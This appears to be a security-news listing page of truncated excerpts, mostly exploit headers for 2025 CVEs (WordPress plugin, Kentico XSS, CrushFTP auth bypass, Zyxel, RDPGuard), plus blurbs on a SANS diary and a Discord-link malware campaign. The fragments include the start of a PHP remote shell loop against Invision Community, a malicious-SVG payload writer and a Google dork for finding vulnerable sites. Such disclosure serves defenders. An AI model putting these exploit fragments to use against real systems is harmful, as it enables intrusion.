Hacking

# Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 – Privilege Escalation # Google Dork: inurl:/wp-content/plugins/frontend-login-and-registration-blocks/ # Date: 2025-05-12 # Exploit Author: Md Shoriful Islam (RootHarpy) # Vendor Homepage: https://wordpress.org/plugins/frontend-login-and-registration-blocks/ # Software Link: https://downloads.wordpress.org/plugin/frontend-login-and-registration-blocks.1.0.7.zip # Version: <= 1.0.7 # Tested on: Ubuntu 22.04 + WordPress 6.5.2 # CVE : CVE-2025-3605 import requests …

# Exploit Title: Kentico Xperience 13.0.178 – Cross Site Scripting (XSS) # Date: 2025-05-09 # Version: Kentico Xperience before 13.0.178 # Exploit Author: Alex Messham # Contact: ramessham@gmail.com # Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178—XSS-POC/ # CVE: CVE-2025-32370 import requests import subprocess import os import argparse def create_svg_payload(svg_filename: str): print(f”[*] Writing malicious SVG to: {svg_filename}”) svg_payload =…

[This is a Guest Diary by William Constantino, an ISC intern as part of the SANS.edu BACS program] In the beginning of my Internet Storm Center (ISC) internship, I wasted too much time trying to build my SIEM from an old computer I had lying around, or a new Raspberry Pi I purchased. I keep…

Check Point Research uncovered an active malware campaign exploiting expired and released Discord invite links. Attackers hijacked the links through vanity link registration, allowing them to silently redirect users from trusted sources to malicious servers. The attackers combined the ClickFix phishing technique, multi-stage loaders, and time-based evasions to stealthily deliver AsyncRAT, and a customized Skuld…

# Exploit Title: RDPGuard 9.9.9 – Privilege Escalation # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 09.05.2025 # Vendor Homepage: https://rdpguard.com # Software Link: https://rdpguard.com/download.aspx # Tested Version: 9.9.9 (latest) # Tested on: Windows 10 (32bit) # # # Steps to Reproduce # # # # 1. Prepare a .bat file containing…

\n”; print “\nExample….: php $argv[0] http://localhost/invision/”; print “\nExample….: php $argv[0] https://invisioncommunity.com/\n\n”; die(); } $ch = curl_init(); $params = [“app” => “core”, “module” => “system”, “controller” => “themeeditor”, “do” => “customCss”]; curl_setopt($ch, CURLOPT_URL, $argv[1]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); while (1) { print “\ninvision-shell# “; if (($cmd =…

# Exploit Title: Zyxel USG FLEX H series uOS 1.31 – Privilege Escalation # Date: 2025-04-23 # Exploit Author: Marco Ivaldi # Vendor Homepage: https://www.zyxel.com/ # Version: Zyxel uOS V1.31 (see https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-= =3D advisory-for-incorrect-permission-assignment-and-improper-privilege-managem= =3D ent-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025) # Tested on: Zyxel FLEX100H with Firmware V1.31(ABXF.0) and Zyxel FLEX200H with Firmware V1.31(ABWV.0) # CVE: CVE-2025-1731 …

# Exploit Title: CrushFTP 11.3.1 – Authentication Bypass # Date: 2025-05-15 # Exploit Author: @İbrahimsql # Exploit Author’s github: https://github.com/ibrahimsql # Vendor Homepage: https://www.crushftp.com # Software Link: https://www.crushftp.com/download.html # Version: < 10.8.4, < 11.3.1 # Tested on: Ubuntu 22.04 LTS, Windows Server 2019, Kali Linux 2024.1 # CVE: CVE-2025-31161 # Description: # CrushFTP before…

# Exploit Title: Remote Keyboard Desktop 1.0.1 – Remote Code Execution (RCE) # Date: 05/17/2025 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://remotecontrolio.web.app/ # Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare # Version: 1.0.1 # Tested on: Windows 10 Pro Build 19045 # Start Remote Keyboard Desktop on your windows # Preparing: # # 1. Generating payload…

# Exploit Title: ABB Cylon Aspect Studio 3.08.03 – Binary Planting # Vendor: ABB Ltd. # Product web page: https://www.global.abb # Affected version: <=3.08.03 # Tested on: Microsoft Windows 10 Home (EN) OpenJDK 64-Bit Server VM Temurin-21.0.6+7 # Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic @zeroscience # Advisory ID: ZSL-2025-5952 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5952.php …